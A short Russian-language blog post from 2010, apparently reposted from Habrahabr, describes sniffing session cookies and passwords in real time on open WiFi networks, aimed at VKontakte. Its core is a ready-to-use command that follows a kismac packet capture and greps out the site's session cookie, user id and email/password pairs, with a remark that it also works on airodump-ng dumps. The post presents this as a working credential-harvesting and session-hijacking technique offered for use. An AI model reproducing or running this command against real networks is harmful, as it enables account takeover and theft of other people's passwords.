понедельник, 20 декабря 2010 г.

Перехват cookie в реальном времени в открытых WiFi-сетях



На видео показан угон сессии вконтакте.ру, который почему-то до сих пор не использует авторизацию с https и передает пароли открытым текстом.
Дамп трафика собирается программой kismac в формате libpcap и параллельно парсится grep-ом с использованием регулярных выражений, что позволяет в реальном времени выводить на экран все интересующие куки и пароли. При этом не используется никаких анализаторов пакетов.

regexp для перехвата вконтакте.ру:

tail -F pcap.файл | cat | grep -aEo «remixsid=[0-9a-f]+|l=[0-9]{3,12}|p=[0-9a-f]{36}|email=[^&]+&pass=[^ ]+»

Аналогичная конструкция будет работать и с дампом собранным с помощью airdump-ng.


Источник: Хабрахабр - Информационная безопасность
Оригинальная страница: Перехват cookie в реальном времени в открытых WiFi-сетях

Комментариев нет:

Отправить комментарий